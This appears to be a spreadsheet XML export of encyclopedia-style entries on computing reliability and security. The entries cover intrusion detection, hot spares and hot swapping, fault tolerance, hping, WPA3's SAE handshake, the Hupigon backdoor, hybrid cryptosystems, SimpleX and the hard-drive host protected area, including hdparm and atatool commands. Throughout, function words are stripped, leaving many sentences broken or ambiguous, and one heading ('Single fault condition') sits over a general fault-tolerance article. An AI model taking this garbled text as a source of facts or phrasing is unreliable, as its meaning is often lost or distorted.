manufacturers hids usually construct object-database makes frequent updates checksum database unnecessary. computer systems generally many dynamic (frequently changing) objects intruders want modify hids thus monitor dynamic nature makes unsuitable checksum technique. overcome problem, hids employ various detection techniques: monitoring changing file-attributes, log-files decreased size since last checked, numerous means detect unusual events. once system administrator constructed suitable object-database ideally help advice hids installation tools initialized checksum-database, hids requires scan monitored objects regularly report anything appear gone wrong. reports take form logs, e-mails similar. protecting hids hids usually great lengths prevent object-database, checksum-database reports form tampering. after all, intruders succeed modifying objects hids monitors, nothing stop intruders modifying hids unless security administrators take appropriate precautions. many worms viruses disable anti-virus tools, example. apart crypto-techniques, hids might allow administrators store databases cd-rom read-only memory devices (another factor favor infrequent updates...) storing off-system memory. similarly, hids often send logs off-system immediately typically using channels central management system. could argue trusted platform module comprises type hids. although scope differs many ways hids, fundamentally provides means identify whether anything/anyone tampered portion computer. architecturally provides ultimate least point time) host-based intrusion detection, depends hardware external itself, thus making much harder intruder corrupt object checksum databases. reception infoworld states host-based intrusion-detection system software useful network managers find malware, suggest every server, critical servers. also host-based intrusion detection system comparison internet security systems commercial hids nids open source tripwire open source hids ossec multi-platform open source hids trusted computing group references external links deep security commercial multi-platform hids lacework hids commercial hids cloud deployments</t>
  </si>
  <si>
    <t>Hot spare</t>
  </si>
  <si>
    <t>spare warm spare standby used failover mechanism provide reliability system configurations. spare active connected part working system. when component fails, spare switched operation. more generally, standby used refer device system held readiness overcome otherwise significant start-up delay. examples examples spares components switches, computers, network printers, hard disks. equipment powered considered "hot," actively functioning (i.e. used system. electrical generators held standby, steam train held shed fired (literally hot) ready replace possible failure engine service. explanation designing reliable system, recognized failures. extreme, complete system duplicated kept date—so event primary system failing, secondary system switched little interruption. more often, spare single vital component without entire system would fail. spare component integrated system event problem, system altered spare component. this done automatically manually, either case normal means error detection. spare necessarily give 100% availability protect temporary loss system switching process; designed significantly reduce time system unavailable. standby slightly different connotation active productive spare, state rather object. example, national power grid, supply power needs balanced demand short term. take many hours bring coal-fired power station productive temperatures. allow load balancing, generator turbines kept running generators switched peaks demand occur, generators rapidly switched balance load. being state ready known standby. though modern phenomenon, steam train operators might hold spare steam engine terminus fired starting engine cold would take significant amount time. spare similar component system, system reduced performance, designed cope duration time repair recover original component. high availability systems, common design spare quickly switched also failed component repaired replaced without stopping system known swapping. considered probability second failure low, therefore system designed simply allow operation continue suitable maintenance period. appropriate solution normally determined balancing costs implementing availability likelihood problem severity problem. types standby: standby master slave standby shearing mode computer usage spare disk disk group disks used automatically manually, depending upon spare policy, replace failing failed disk raid configuration. spare disk reduces mean time recovery (mttr) raid redundancy group, thus reducing probability second disk failure resultant data loss would occur singly redundant raid (e.g., raid-1, raid-5, raid-10). typically, spare available replace number different disks systems employing spare normally require redundant group allow time data generated onto spare disk. during time system exposed data loss subsequent failure, therefore automatic switching spare disk reduces time exposure risk compared manual discovery implementation. concept spares limited hardware, also software systems held state readiness, example database server software copy standby, possibly even machine cope various factors make database unreliable, impact disc failure, poorly written queries database software errors. standby operation railway signalling least units type powered receiving inputs, performing identical computations producing identical outputs nearly-synchronous manner. outputs typically physical outputs (individual on/off type digital signals, analog signals), serial data messages wrapped suitable protocols depending upon nature intended use. outputs unit (designated master on-line unit, application logic) used control external devices (such switches, signals, on-board propulsion/braking control devices, etc.) simply provide displays. unit hot-standby spare unit, ready take master unit fails. when master unit fails, automatic failover spare occurs within short time outputs spare, master unit, delivered controlled devices displays. controlled devices displays experience short blip disturbance failover time. however, designed tolerate/ignore disturbances overall system operation affected. standby operation vacuum tubes this means device, section device, need activated instantly, kept vacuum tubes (pre-)heated anode voltage supply switched off. this causes normal cathode coatings fail prematurely. also dual modular redundancy references</t>
  </si>
  <si>
    <t>Hot swapping</t>
  </si>
  <si>
    <t>swapping replacement addition components computer system without stopping, shutting down, rebooting system; plugging describes addition components only. components functionality said hot-swappable hot-pluggable; likewise, components cold-swappable cold-pluggable. most desktop computer hardware, cpus memory, cold-pluggable. however, common high-end servers mainframes feature hot-swappable capability hardware components, cpu, memory, pcie, sata drives. example swapping express ability pull universal serial (usb) peripheral device, thumb drive, external hard disk drive (hdd), mouse, keyboard, printer computer's slot peripheral without ejecting first. most smartphones tablets tray-loading holders interchange cards without powering system. dedicated digital cameras camcorders usually readily accessible memory card battery compartments quick changing minimal interruption operation. batteries cycled recharging reserve batteries externally unused. many cameras camcorders feature internal memory allow capturing memory card inserted. rationale swapping used whenever desirable change configuration repair working system without interrupting operation. simply convenience avoiding delay nuisance shutting restarting complex equipment essential equipment, server, continuously active. swapping used remove peripherals components, allow device synchronize data computer, replace faulty modules without interrupting equipment operation. machine dual power supplies, adequate power machine; faulty hot-swapped. important cards disk controllers host adapters designed redundant paths order replaceable case failure without necessitating interruption associated computer system operation. system considerations machines support swapping need able modify operation changed configuration, either automatically detecting change, user intervention. electrical mechanical connections associated hot-swapping must designed neither equipment user harmed hot-swapping. other components system must designed removal hot-swappable component interrupt operation. mechanical design protective covering plates, shields, bezels used either removable components main device prevent operator contact live powered circuitry, provide antistatic protection components added removed, prevent removable components accidentally touching shorting powered components operating device. additional guide slots, pins, notches, holes used proper insertion component live components, mechanical engagement latches, handles, levers used assist proper insertion removal devices either require large amounts force connect disconnect, assist proper mating holding together power communications connectors. variations there slightly differing meanings term swapping. refer ability remove hardware without powering system, system software notified user event order cope examples include rs-232 lower-end scsi devices. examples include usb, firewire higher-end scsi devices. some implementations require component shutdown procedure prior removal. this simplifies design, devices robust case component failure. component removed used, operations device fail user responsible retrying necessary, although usually considered problem. more complex implementations recommend require component shut down, sufficient redundancy system allow operation continue component removed without shut down. systems swap normally used regular maintenance computer, replace broken component. connectors most modern hot-swap methods specialized connector staggered pins, certain pins certain connected others. most staggered-pin designs ground pins longer others, ensuring sensitive circuitry connected reliable system ground. pins length, cases three lengths used incoming device grounded first, data lines connected second, power applied third, rapid succession device inserted. pins nominal length necessarily make contact exactly time mechanical tolerances, angling connector inserted. time staggered pins thought expensive solution, many contemporary connector families come staggered pins standard; example, used modern serial scsi disk-drives. specialized hot-plug power connector pins commercially available repeatable current interruption ratings printed circuit boards made staggered edge-fingers direct hot-plugging backplane connector. although speed plugging cannot controlled precisely, practical considerations provide limits used determine worst-case conditions. typical staggered design length difference elapsed time long short contact quite practical design hot-swap circuits operate speed. long hot-swap connector sufficiently rigid, four corner pins always first engage. typical two-row connector arrangement provides four first-to-make corner pins usually used grounds. other pins near corners used functions would also benefit effect, example sensing connector fully seated. this diagram illustrates good practice grounds corners power pins near center. sense pins located opposite corners fully seated detection confirmed contact slot. remaining pins used data signals. power electronics power supplies hot-swap component usually pre-charged dedicated long pins make contact main power pins. these pre-charge pins protected circuit limits inrush current acceptable value cannot damage pins disturb supply voltage adjacent slots. pre-charge circuit might simple series resistor, negative temperature coefficient (ntc) resistor, current-limiter circuit. further protection provided "soft-start" circuit provides managed ramp-up internal supply voltages within component. typical sequence hot-swap component plugged slot could follows: long ground pins make contact; basic electrical safety protection becomes available. long medium) pre-charge pins make contact; decoupling capacitors start charge real time delay tens milliseconds. short power/signal pins make contact. connector becomes fully seated; power-on reset signal asserted within component soft-start circuit starts apply power component. real time delay tens milliseconds. soft-start circuit completes sequence; power-on reset circuit deasserted component begins normal operation.hot-swap power circuits purchased commercially specially designed asics called hot-swap power managers (hspms). signal electronics circuitry attached signal pins hot-swap component include protection electrostatic discharge (esd). this usually takes form clamp diodes ground power supply voltage. effects reduced careful design mechanical package around hot-swap component, perhaps coating thin film conductive material. particular care must taken designing systems bussed signals wired hot-swap component. when hot-swap component inserted input output signal pins represent temporary short-circuit ground. this cause unwanted ground-level pulses signals disturb operation hot-swap components system. this problem early parallel scsi disk-drives. common design solution protect bussed signal pins series diodes resistors. cmos buffer devices available specialized inputs outputs minimize disturbance bussed signals hot-swap operation. else fails, another solution quiesce operation components hot-swap operation. applications radio transmitters modern radio transmitters (and transmitters well) high power transistor power modules instead vacuum tubes. swapping power modules technology, many radio transmitters manufactured 1930s capable power tubes swapped transmitter running—but feature universally adopted introduction reliable high power tubes. mid-1990s, several radio transmitter manufactures started offering swappable high power transistor modules. there industry standard design swappable power modules time. early module designs limited patent protection. early 2000s, many transmitter models available used many different kinds power modules.the reintroduction power modules good radio transmitter industry, fostered innovation. modular transmitters proven reliable tube transmitters, transmitter properly chosen conditions transmitting site. power limitations: lowest power modular transmitter: generally using modules. highest power modular transmitter: (for mw). highest power modular transmitter: (fm, tv). gaming although contemporary video game systems interchange games multimedia (e.g. blu-rays) without powering system, older generations systems varied support hot-swapping capabilities. example, whereas sony playstation playstation could eject game disc system powered nintendo game advance nintendo would freeze could potentially become corrupt game cartridge removed power manufacturers specifically warned practices owner's manual game cartridge. supposedly reason stop swop taken banjo-kazooie series. with sega genesis/mega drive system, sometimes possible apply cheats (such player infinite lives) temporary software alterations games swapping cartridges, even though cartridges designed swappable. software swapping also refer ability alter running code program without needing interrupt execution. interactive programming programming paradigm makes extensive swapping, programming activity becomes part program flow itself. only programming languages support swapping natively, including pike, lisp, erlang, smalltalk, visual basic (not vb.net), java recently elixir. microsoft visual studio supports kind swapping called edit continue, supported vb.net c/c++ running debugger.hot swapping central method live coding, programming integral part runtime process. general, programming languages used live coding, supercollider, tidalcycles, extempore support swapping. some web-based frameworks, django, support detecting module changes reloading fly. however, although hotswapping intents purposes, technically cache purge, triggered file. this apply markup programming languages html respectively, general case, files normally re-interpreted default. there cmss php-based frameworks (such drupal) employ caching, however. cases, similar abilities exceptions apply. swapping also facilitates developing systems large amounts data processed, entire genomes bioinformatics algorithms. trademarks term "hot plug" registered trademark united states november 1992 core international, inc., cancelled 1999. also udev references</t>
  </si>
  <si>
    <t>Single fault condition</t>
  </si>
  <si>
    <t>fault tolerance property enables system continue operating properly event failure faults within components. operating quality decreases all, decrease proportional severity failure, compared naively designed system, even small failure cause total breakdown. fault tolerance particularly sought high-availability, mission-critical, even life-critical systems. ability maintaining functionality portions system break referred graceful degradation.a fault-tolerant design enables system continue intended operation, possibly reduced level, rather failing completely, part system fails. term commonly used describe computer systems designed continue less fully operational with, perhaps, reduction throughput increase response time event partial failure. that system whole stopped problems either hardware software. example another field motor vehicle designed continue drivable tires punctured, structure able retain integrity presence damage causes fatigue, corrosion, manufacturing flaws, impact. within scope individual system, fault tolerance achieved anticipating exceptional conditions building system cope them, and, general, aiming self-stabilization system converges towards error-free state. however, consequences system failure catastrophic, cost making sufficiently reliable high, better solution form duplication. case, consequence system failure catastrophic, system must able reversion fall back safe mode. this similar roll-back recovery human action humans present loop. history first known fault-tolerant computer sapo, built 1951 czechoslovakia antonín svoboda.: basic design magnetic drums connected relays, voting method memory error detection (triple modular redundancy). several machines developed along line, mostly military use. eventually, separated three distinct categories: machines would last long time without maintenance, ones used nasa space probes satellites; computers dependable required constant monitoring, used monitor control nuclear power plants supercollider experiments; finally, computers high amount runtime would heavy use, many supercomputers used insurance companies probability monitoring. most development so-called llnm (long life, maintenance) computing done nasa 1960s, preparation project apollo research aspects. nasa's first machine went space observatory, second attempt, jstar computer, used voyager. this computer backup memory arrays memory recovery methods thus called self-testing-and-repairing computer. could detect errors bring redundant modules needed. computer still working, early 2022.hyper-dependable computers pioneered mostly aircraft manufacturers,: nuclear power companies, railroad industry usa. these needed computers massive amounts uptime would fail gracefully enough fault allow continued operation relying fact computer output would constantly monitored humans detect faults. again, developed first computer kind nasa guidance saturn rockets, later bnsf, unisys, general electric built own.: 1970s, much work happened field instance, cadc built-in self-test redundancy.in general, early efforts fault-tolerant designs focused mainly internal diagnosis, fault would indicate something failing worker could replace sapo, instance, method faulty memory drums would emit noise failure. later efforts showed fully effective, system self-repairing diagnosing isolating fault implementing redundant backup alerting need repair. this known n-model redundancy, faults cause automatic fail-safes warning operator, still common form level fault-tolerant design today. voting another initial method, discussed above, multiple redundant backups operating constantly checking other's results, outcome example, four components reported answer component reported answer four would "vote" fifth component faulty taken service. this called majority voting. historically, motion always move n-model fact complexity systems difficulty ensuring transitive state fault-negative fault-positive disrupt operations. tandem stratus among first companies specializing design fault-tolerant computer systems online transaction processing. examples hardware fault tolerance sometimes requires broken parts taken replaced parts system still operational computing known swapping). such system implemented single backup known single point tolerant represents vast majority fault-tolerant systems. systems mean time failures long enough operators sufficient time broken devices (mean time repair) backup also fails. helpful time failures long possible, specifically required fault-tolerant system. fault tolerance notably successful computer applications. tandem computers built entire business machines, used single-point tolerance create nonstop systems uptimes measured years. fail-safe architectures encompass also computer software, example process replication. data formats also designed degrade gracefully. html example, designed forward compatible, allowing browsers ignore unsupported html entities without causing document unusable. additionally, sites, including popular platforms twitter (until december 2020), provide optional lightweight front rely javascript minimal layout, ensure wide accessibility outreach, game consoles limited browsing capabilities. terminology highly fault-tolerant system might continue level performance even though components failed. example, building backup electrical generator provide voltage wall outlets even grid power fails. system designed fail safe, fail-secure, fail gracefully, whether functions reduced level fails completely, protects people, property, data injury, damage, intrusion, disclosure. computers, program might fail-safe executing graceful exit opposed uncontrolled crash) order prevent data corruption experiencing error. similar distinction made "failing well" "failing badly". fail-deadly opposite strategy, used weapon systems designed kill injure targets even part system damaged destroyed. system designed experience graceful degradation, fail soft (used computing, similar "fail safe") operates reduced level performance component failures. example, building operate lighting reduced levels elevators reduced speeds grid power fails, rather either trapping people dark completely continuing operate full power. computing example graceful degradation insufficient network bandwidth available stream online video, lower-resolution version might streamed place high-resolution version. progressive enhancement example computing, pages available basic functional format older, small-screen, limited-capability browsers, enhanced version browsers capable handling additional technologies larger display available. fault-tolerant computer systems, programs considered robust designed continue operation despite error, exception, invalid input, instead crashing completely. software brittleness opposite robustness. resilient networks continue transmit data despite failure links nodes; resilient buildings infrastructure likewise expected prevent complete failure situations like earthquakes, floods, collisions. system high failure transparency alert users component failure occurred, even continues operate full performance, failure repaired imminent complete failure anticipated. likewise, fail-fast component designed report first point failure, rather allow downstream components fail generate reports then. this allows easier diagnosis underlying problem, prevent improper operation broken state. single fault condition single fault condition situation means protection hazard defective. single fault condition results unavoidably another single fault condition, failures considered single fault condition. source offers following example: single-fault condition condition single means protection hazard equipment defective single external abnormal condition present, e.g. short circuit live parts applied part. criteria providing fault-tolerant design every component normally option. associated redundancy brings number penalties: increase weight, size, power consumption, cost, well time design, verify, test. therefore, number choices examined determine components fault tolerant: critical component? car, radio critical, component less need fault tolerance. likely component fail? some components, like drive shaft car, likely fail, fault tolerance needed. expensive make component fault tolerant? requiring redundant engine, example, would likely expensive economically terms weight space, considered.an example component passes tests car's occupant restraint system. while normally think primary occupant restraint system, gravity. vehicle rolls undergoes severe g-forces, primary method occupant restraint fail. restraining occupants accident absolutely critical safety, pass first test. accidents causing occupant ejection quite common seat belts, pass second test. cost redundant restraint method like seat belts quite low, economically terms weight space, pass third test. therefore, adding seat belts vehicles excellent idea. other "supplemental restraint systems", airbags, expensive pass test smaller margin. another excellent long-term example principle practice braking system: whilst actual brake mechanisms critical, particularly prone sudden (rather progressive) failure, case necessarily duplicated allow even balanced application brake force wheels. would also prohibitively costly double-up main components would considerable weight. however, similarly critical systems actuating brakes driver control inherently less robust, generally using cable (can rust, stretch, jam, snap) hydraulic fluid (can leak, boil develop bubbles, absorb water thus lose effectiveness). thus modern cars footbrake hydraulic brake circuit diagonally divided give smaller points failure, loss either reducing brake power causing much dangerous brakeforce imbalance straight front-back left-right split, hydraulic circuit fail completely relatively rare occurrence), failsafe form cable-actuated parking brake operates otherwise relatively weak rear brakes, still bring vehicle safe halt conjunction transmission/engine braking long demands line normal traffic flow. cumulatively unlikely combination total foot brake failure need harsh braking emergency likely result collision, still lower speed would otherwise case. comparison foot pedal activated service brake, parking brake less critical item, unless used one-time backup footbrake, cause immediate danger found nonfunctional moment application. therefore, redundancy built (and typically uses cheaper, lighter, less hardwearing cable actuation system), suffice, happens hill, footbrake momentarily hold vehicle still, driving find flat piece road stop. alternatively, shallow gradients, transmission shifted park, reverse first gear, transmission lock engine compression used hold stationary, need include sophistication first bring halt. motorcycles, similar level fail-safety provided simpler methods; firstly front rear brake systems entirely separate, regardless method activation (that cable, hydraulic), allowing fail entirely whilst leaving unaffected. secondly, rear brake relatively strong compared automotive cousin, even powerful disc sports models, even though usual intent front system provide vast majority braking force; overall vehicle weight central, rear tyre generally larger grippier, rider lean back weight therefore allowing brake force applied wheel locks cheaper, slower utility-class machines, even front wheel hydraulic disc extra brake force easier packaging, rear usually primitive, somewhat inefficient, exceptionally robust rod-actuated drum, thanks ease connecting footpedal wheel and, importantly, near impossibility catastrophic failure even rest machine, like low-priced bikes first years use, point collapse neglected maintenance. requirements basic characteristics fault tolerance require: single point failure system experiences failure, must continue operate without interruption repair process. fault isolation failing component when failure occurs, system must able isolate failure offending component. this requires addition dedicated failure detection mechanisms exist purpose fault isolation. recovery fault condition requires classifying fault failing component. national institute standards technology (nist) categorizes faults based locality, cause, duration, effect. fault containment prevent propagation failure some failure mechanisms cause system fail propagating failure rest system. example kind failure "rogue transmitter" swamp legitimate communication system cause overall system failure. firewalls mechanisms isolate rogue transmitter failing component protect system required. availability reversion modesin addition, fault-tolerant systems characterized terms planned service outages unplanned service outages. these usually measured application level hardware level. figure merit called availability expressed percentage. example, five nines system would statistically provide 99.999% availability. fault-tolerant systems typically based concept redundancy. fault tolerance techniques research kinds tolerances needed critical systems involves large amount interdisciplinary work. complex system, carefully possible interactions considered prepared for. considering importance high-value systems transport, public utilities military, field topics touch research wide: include obvious subjects software modeling reliability, hardware design, arcane elements stochastic models, graph theory, formal exclusionary logic, parallel processing, remote data transmission, more. replication spare components address first fundamental characteristic fault tolerance three ways: replication: providing multiple identical instances system subsystem, directing tasks requests parallel, choosing correct result basis quorum; redundancy: providing multiple identical instances system switching remaining instances case failure (failover); diversity: providing multiple different implementations specification, using like replicated systems cope errors specific implementation.all implementations raid, redundant array independent disks, except raid examples fault-tolerant storage device uses data redundancy. lockstep fault-tolerant machine uses replicated elements operating parallel. time, replications element state. inputs provided replication, outputs expected. outputs replications compared using voting circuit. machine replications element termed dual modular redundant (dmr). voting circuit detect mismatch recovery relies methods. machine three replications element termed triple modular redundant (tmr). voting circuit determine replication error two-to-one vote observed. case, voting circuit output correct result, discard erroneous version. after this, internal state erroneous replication assumed different two, voting circuit switch mode. this model applied larger number replications. lockstep fault-tolerant machines easily made fully synchronous, gate replication making state transition edge clock, clocks replications exactly phase. however, possible build lockstep systems without requirement. bringing replications synchrony requires making internal stored states same. they started fixed initial state, reset state. alternatively, internal state replica copied another replica. variant pair-and-spare. replicated elements operate lockstep pair, voting circuit detects mismatch operations outputs signal indicating error. another pair operates exactly way. final circuit selects output pair proclaim error. pair-and-spare requires four replicas rather three tmr, used commercially. failure-oblivious computing failure-oblivious computing technique enables computer programs continue executing despite errors. technique applied different contexts. first, handle invalid memory reads returning manufactured value program, turn, makes manufactured value ignores former memory value tried access, great contrast typical memory checkers, inform program error abort program. second, applied exceptions catch blocks written synthesized catch unexpected exceptions. furthermore, happens execution modified several times row, order prevent cascading failures.the approach performance costs: technique rewrites code insert dynamic checks address validity, execution time increase 500%. recovery shepherding recovery shepherding lightweight technique enable software programs recover otherwise fatal errors null pointer dereference divide zero. comparing failure oblivious computing technique, recovery shepherding works compiled program binary directly need recompile program. uses just-in-time binary instrumentation framework pin. attaches application process error occurs, repairs execution, tracks repair effects execution continues, contains repair effects within application process, detaches process repair effects flushed process state. interfere normal execution program therefore incurs negligible overhead. systematically collected real world null-dereference divide-by-zero errors, prototype implementation enables application continue execute provide acceptable output service users error-triggering inputs. circuit breaker circuit breaker design pattern technique avoid catastrophic failures distributed systems. redundancy redundancy provision functional capabilities would unnecessary fault-free environment. this consist backup components automatically "kick component fails. example, large cargo trucks lose tire without major consequences. they many tires, tire critical (with exception front tires, used steer, generally carry less load, total, four less likely fail). idea incorporating redundancy order improve reliability system pioneered john neumann 1950s.two kinds redundancy possible: space redundancy time redundancy. space redundancy provides additional components, functions, data items unnecessary fault-free operation. space redundancy classified hardware, software information redundancy, depending type redundant resources added system. time redundancy computation data transmission repeated result compared stored copy previous result. current terminology kind testing referred service fault tolerance testing isftt short. disadvantages fault-tolerant design's advantages obvious, many disadvantages not: interference fault detection component. continue passenger vehicle example, either fault-tolerant systems obvious driver tire punctured. this usually handled separate "automated fault-detection system". case tire, pressure monitor detects loss pressure notifies driver. alternative "manual fault-detection system", manually inspecting tires stop. interference fault detection another component. another variation problem fault tolerance component prevents fault detection different component. example, component performs operation based output component fault tolerance hide problem component later changed less fault-tolerant design) system fail suddenly, making appear component problem. only system carefully scrutinized become clear root problem actually component reduction priority fault correction. even operator aware fault, fault-tolerant system likely reduce importance repairing fault. faults corrected, eventually lead system failure, fault-tolerant component fails completely redundant components also failed. test difficulty. certain critical fault-tolerant systems, nuclear reactor, easy verify backup components functional. infamous example chernobyl, operators tested emergency backup cooling disabling primary secondary cooling. backup failed, resulting core meltdown massive release radiation. cost. both fault-tolerant components redundant components tend increase cost. this purely economic cost include measures, weight. manned spaceships, example, many redundant fault-tolerant components weight increased dramatically unmanned systems, require level safety. inferior components. fault-tolerant design allow inferior components, would otherwise made system inoperable. while practice potential mitigate cost increase, multiple inferior components lower reliability system level equal even worse than, comparable non-fault-tolerant system. related terms there difference fault tolerance systems rarely problems. instance, western electric crossbar systems failure rates hours forty years, therefore highly fault resistant. fault occur still stopped operating completely, therefore fault tolerant. also references</t>
  </si>
  <si>
    <t>Hping</t>
  </si>
  <si>
    <t>hping open-source packet generator analyzer tcp/ip protocol created salvatore sanfilippo (also known antirez). common tools used security auditing testing firewalls networks, used exploit idle scan scanning technique (also invented hping author), implemented nmap security scanner. version hping, hping3, scriptable using language implements engine string based, human-readable description tcp/ip packets programmer write scripts related level tcp/ip packet manipulation analysis short time. also nmap security scanner: nmap hping often considered complementary another. mausezahn: another fast versatile packet generator also supports ethernet header manipulation. packet sender: packet generator focus ease use. external links hping website hping wiki idle scanning, paper nmap author fyodor. hping fixed windows (service pack mausezahn website</t>
  </si>
  <si>
    <t>Simultaneous Authentication of Equals</t>
  </si>
  <si>
    <t>cryptography, simultaneous authentication equals (sae) password-based authentication password-authenticated agreement method. authentication variant dragonfly exchange defined 7664, based diffie–hellman exchange using finite cyclic groups primary cyclic group elliptic curve. problem using diffie–hellman exchange authentication mechanism. resulting influenced pre-shared addresses peers solve authentication problem. ieee 802.11s originally implemented peers ieee 802.11s. when peers discover (and security enabled) take part exchange. completes successfully, peer knows party possesses mesh password and, by-product exchange, peers establish cryptographically strong key. this used "authenticated mesh peering exchange" (ampe) establish secure peering derive session protect mesh traffic, including routing traffic. wpa3 january 2018, wi-fi alliance announced wpa3 replacement wpa2. standard uses 128-bit encryption wpa3-personal mode (192-bit wpa3-enterprise) forward secrecy. wpa3 standard also replaces pre-shared (psk) exchange simultaneous authentication equals defined ieee 802.11-2016 resulting secure initial exchange personal mode. wi-fi alliance also claims wpa3 mitigate security issues posed weak passwords simplify process setting devices display interface. security 2019 eyal ronen mathy vanhoef (co-author krack attack) released analysis wpa3's dragonfly handshake found attacker within range victim still recover password" bugs found "allow adversary impersonate user, thereby access wi-fi network, without knowing user's password." also extensible authentication protocol (eap) key-agreement protocol krack ieee 802.1x references further reading harkins, (aug 2008). "simultaneous authentication equals: secure, password-based exchange mesh networks". 2008 second international conference sensor technologies applications (sensorcomm 2008). 839–844. doi:10.1109/sensorcomm.2008.131. isbn 978-0-7695-3330-8. s2cid 18401678 ieee xplore. vanhoef, mathy; ronen, eyal (2019-04-10). "dragonblood: analyzing dragonfly handshake wpa3 eap-pwd". ieee symposium security privacy. ieee.</t>
  </si>
  <si>
    <t>Hupigon</t>
  </si>
  <si>
    <t>hupigon (also graftor) detected (backdoor.win32.hupigon, trojan.win32.hupigon, backdoor.win32.graftor, trojan.win32.graftor) backdoor trojan. first known detection goes back november, 2008, according securelist kaspersky labs.this malicious software, usually portable executable (and packed upx), mostly used order connect (worldwide) group victimized form botnet (also known zombie network). software able spread networks order infect computers computer worms (see conficker). difference backdoors spread automatically worms do), started command control-center supervising them. hupigon family, large number variants. they written borland delphi. other aliases trojan.win32.boht (kaspersky labs fortinet) backdoor:win32/bezigate (microsoft) backdoor.win32.graftor (bitdefender) external links analysis file virustotal analysis file threat expert references</t>
  </si>
  <si>
    <t>Hybrid cryptosystem</t>
  </si>
  <si>
    <t>cryptography, hybrid cryptosystem combines convenience public-key cryptosystem efficiency symmetric-key cryptosystem. public-key cryptosystems convenient require sender receiver share common secret order communicate securely. however, often rely complicated mathematical computations thus generally much inefficient comparable symmetric-key cryptosystems. many applications, high cost encrypting long messages public-key cryptosystem prohibitive. this addressed hybrid systems using combination both.a hybrid cryptosystem constructed using separate cryptosystems: encapsulation mechanism, public-key cryptosystem, data encapsulation scheme, symmetric-key cryptosystem.the hybrid cryptosystem public-key system, whose public private keys encapsulation scheme.note long messages bulk work encryption/decryption done efficient symmetric-key scheme, inefficient public-key scheme used encrypt/decrypt short value.all practical implementations public cryptography today employ hybrid system. examples include protocol protocol, public-key mechanism exchange (such diffie-hellman) symmetric-key mechanism data encapsulation (such aes). openpgp file format pkcs file format examples. hybrid public encryption (hpke, published 9180) modern standard generic hybrid encryption. hpke used within multiple ietf protocols, including encrypted hello. envelope encryption example usage hybrid cryptosystems cloud computing. cloud context, hybrid cryptosystems also enable centralized management. example encrypt message addressed alice hybrid cryptosystem, following: obtains alice's public key. generates fresh symmetric data encapsulation scheme. encrypts message data encapsulation scheme, using symmetric generated. encrypts symmetric encapsulation scheme, using alice's public key. sends ciphertexts alice.to decrypt hybrid ciphertext, alice following: uses private decrypt symmetric contained encapsulation segment. uses symmetric decrypt message contained data encapsulation segment. security encapsulation data encapsulation schemes hybrid cryptosystem secure adaptive chosen ciphertext attacks, hybrid scheme inherits property well. however, possible construct hybrid scheme secure adaptive chosen ciphertext attacks even encapsulation slightly weakened security definition (though security data encapsulation must slightly stronger). envelope encryption envelope encryption term used encrypting hybrid cryptosystem used major cloud service providers, often part centralized management system cloud computing.envelope encryption gives names keys used hybrid encryption: data encryption keys (abbreviated dek, used encrypt data) encryption keys (abbreviated kek, used encrypt deks). cloud environment, encryption envelope encryption involves generating locally, encrypting one's data using dek, issuing request wrap (encrypt) stored potentially secure service. then, wrapped encrypted message constitute ciphertext scheme. decrypt ciphertext, wrapped unwrapped (decrypted) call service, unwrapped used decrypt encrypted message. addition normal advantages hybrid cryptosystem, using asymmetric encryption cloud context provides easier management separation roles, slower.in cloud systems, google cloud platform amazon services, management system (kms) available service. cases, management system store keys hardware security modules, hardware systems protect keys hardware features like intrusion resistance. this means keks also secure stored secure specialized hardware. envelope encryption makes centralized management easier centralized management system needs store keks, occupy less space, requests involve sending wrapped unwrapped deks, less bandwidth transmitting entire messages. since used encrypt many deks, also allows less storage space used kms. this also allows centralized auditing access control point access. also transport layer security secure shell encapsulation mechanism references</t>
  </si>
  <si>
    <t>SimpleX Messaging Protocol</t>
  </si>
  <si>
    <t>simplex messaging protocol (smp) designed focused security privacy. enables data metadata privacy default, uses multiple simplex queues basis. it's designed decentralized client-server network topology. messages forward secrecy server nodes. main difference known protocols user identifiers. simplex chat simplex chat implementation simplex messaging protocol. also comparison instant messaging clients comparison instant messaging protocols comparison user features messaging platforms references</t>
  </si>
  <si>
    <t>Host protected area</t>
  </si>
  <si>
    <t>host protected area (hpa) area hard drive solid-state drive normally visible operating system. first introduced ata-4 standard (t13) 2001. works controller registers contain data queried using commands. data returned gives information drive attached controller. there three commands involved creating using host protected area. commands are: identify device address read native addressoperating systems identify device command find addressable space hard drive. identify device command queries particular register controller establish size drive. this register however changed using address command. value register less actual hard drive size effectively host protected area created. protected work value register returned identify device command thus normally unable address parts drive within hpa. useful software firmware (e.g. bios uefi) able software firmware able referred 'hpa aware'. command entities called read native address. this command accesses register contains true size hard drive. area, controlling hpa-aware program changes value register read identify device found register read read native address. when operations complete, register read identify device returned original fake value. time first implemented hard-disk firmware, bios difficulty booting large hard disks. initial could jumpers hard disk) limit number cylinders 4095 4096 older bios would start. bootloader reset operating system would full hard-disk storage space. used various booting diagnostic utilities, normally conjunction bios. example implementation phoenix firstbios, uses boot engineering extension record (beer) protected area time interface extension services (parties). another example gujin installer install bootloader beer, naming pseudo-partition /dev/hda0 /dev/sdb0; cold boots (from power-down) succeed warm boots (from control-alt-delete) able read hpa. computer manufacturers area contain preloaded install recovery purposes (instead providing media). dell notebooks hide dell mediadirect utility hpa. thinkpad notebooks hide system restore software hpa. also used various theft recovery monitoring service vendors. example, laptop security firm computrace load software reports servers whenever machine booted network. useful even stolen laptop hard drive formatted remains untouched. also used store data deemed illegal thus interest government police computer forensics teams. some vendor-specific external drive enclosures (e.g. maxtor, owned seagate since 2006) known limit capacity unknown replacement hard drives installed enclosure. when occurs, drive appear limited size (e.g. gb), look like bios dynamic drive overlay (ddo) problem. case, must software utilities (see below) read native address address change drive's reported size back native size, avoid using external enclosure affected drive. some rootkits hide avoid detected anti-rootkit antivirus software. some exploits application persistence. identification manipulation identification hard drive achieved number tools methods. note feature hidden commands (documentation states use), "frozen" (until next power-down hard disk) password protected. identification tools atatool data synergy sleuth (free, open software) brian carrier (hpa identification currently linux-only.) encase guidance software forensic toolkit access data identification methods windows program atatool detect hpa. instance, first disk command: atatool /info \\.\physicaldrive0 using linux, various ways detect existence hpa. recent versions linux print message system booting detected. example: dmesg less [...] hdb: host protected area detected. current capacity 12000 sectors native capacity 120103200 sectors (61492 program hdparm (versions above) detect drive invoked parameters: hdparm /dev/sdx versions hdparm compare number sectors output 'hdparm number sectors reported hard drive model's published statistics. manipulation methods windows program atatool used create hpa. instance, create 10gb hpa: atatool /nonvolatilehpa /sethpa:10gb \\.\physicaldrive1 linux program hdparm (version 8.0) create invoked parameters: (sdx: target drive, number non-hpa visible sectors) hdparm /dev/sdx also device configuration overlay (dco) guid 